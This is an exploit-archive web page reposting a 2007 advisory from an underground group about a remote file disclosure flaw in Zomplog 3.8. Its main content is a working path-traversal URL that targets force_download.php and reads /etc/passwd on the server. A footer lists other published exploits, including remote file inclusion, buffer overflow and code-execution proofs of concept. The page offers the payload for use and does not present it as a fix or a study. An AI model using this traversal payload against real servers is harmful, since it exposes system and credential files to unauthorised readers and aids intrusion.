exploits , vulnerabilities , articles , Zomplog 3.8 (force_download.php file) Remote File Disclosure Vuln

2007-03-14 ZomPlog <= 3.7.6 Local File Inclusion Vulnerabilty (win32)

2007-04-18

Zomplog 3.8 (force_download.php file) Remote File Disclosure Vuln

Rated as : Moderate Risk

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+                                              Y! Underground Group       
                                        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+          Portal......:  Zomplog v3.8                                    
                                        +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                       
                                        +
+          Type........:  Remote File Disclosure Vulnerability            
                                        +
+          Download....:  www.zomp.nl/zomplog                             
                                        +
+          Page........:  http://Dj7xpl.2600.ir                           
                                        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+          Bug.........: 
http://[Target]/[Path]/upload/force_download.php?file=[Local Path]         
             +
+          E.g.........: 
http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd  
             +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
securitydot.net - 2007-04-18

Exploits - newest 10 RSS | More

2007-06-15 55498 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32847 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40878 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28513 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19076 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16129 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18739 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16018 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32685 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16646 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit